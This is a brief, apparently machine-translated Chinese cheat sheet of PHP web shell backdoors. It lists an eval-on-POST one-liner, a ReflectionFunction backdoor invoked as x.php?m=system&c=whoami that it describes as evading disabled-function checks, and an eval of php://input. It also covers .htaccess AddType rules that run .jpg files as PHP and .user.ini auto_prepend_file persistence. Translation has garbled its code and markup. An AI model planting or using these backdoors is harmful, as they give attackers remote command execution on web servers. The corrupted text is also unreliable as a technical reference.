, phpspy & lt; ? php@eval ($ _POST [' cmd ']); ?在
& lt; ? php
,,, func=new ReflectionFunction美元($ _GET [m]);
,,, echo $ func→invokeArgs(数组($ _GET [c]));
?在
调用如x.php ? m=system& c=whoami
后门也可绕过某些检测禁用系统函数的防护系统
php://输入是用来接收文章数据(这里有php://输入的介绍)
& lt; ? php
@eval (file_get_contents (“php://输入”))
?在
,
发布系统(“whoami”);
网络服务器)
可以设置任意后缀也可以设置UTF7编码格式壳
AddType ,应用程序/x-httpd-php ,,,jpg JPGshell
fastcgi)
,动态修改PHP . ini中配置文件
User.ini
auto_prepend_file:指定在每个PHP页面执行前所要执行的代码
auto_prepend_file=demo.gif(每个页面都会加载demo.gif)
使用PHP://输入(不需要上传额外的文件)(需要自行打开allow_url_include=在默认为)
http://php.net/manual/zh/ini.list.php
http://php.net/manual/zh/configuration.changes.modes.php
